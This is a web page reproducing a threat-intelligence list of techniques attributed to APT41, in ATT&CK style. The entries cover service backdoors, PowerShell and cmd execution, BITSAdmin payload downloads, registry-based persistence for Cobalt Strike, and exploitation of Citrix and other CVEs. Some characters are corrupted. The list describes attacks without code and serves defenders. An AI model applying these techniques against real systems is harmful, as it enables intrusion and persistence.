Ĭreate or Modify System Process: Windows ServiceĪPT41 modified legitimate Windows services to install malware backdoors. ĪPT41 created user accounts and adds them to the User and Admin groups. Ĭommand and Scripting Interpreter: Unix ShellĪPT41 executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices. APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader. Ĭommand and Scripting Interpreter: Windows Command ShellĪPT41 used cmd.exe /c to execute commands on remote machines. Ĭommand and Scripting Interpreter: PowerShellĪPT41 leveraged PowerShell to deploy malware families in victims’ environments. ĪPT41 performed password brute-force attacks on the local admin account. APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike. īoot or Logon Autostart Execution: Registry Run Keys / Startup FolderĪPT41 created and modified startup files for persistence. ĪPT41 used BITSAdmin to download and install payloads. Īrchive Collected Data: Archive via UtilityĪPT41 created a RAR archive of targeted files for exfiltration. Īpplication Layer Protocol: File Transfer ProtocolsĪPT41 used exploit payloads that initiate download via FTP. Enterprise Layer download view Techniques Used DomainĪpplication Layer Protocol: Web ProtocolsĪPT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.
0 Comments
Leave a Reply. |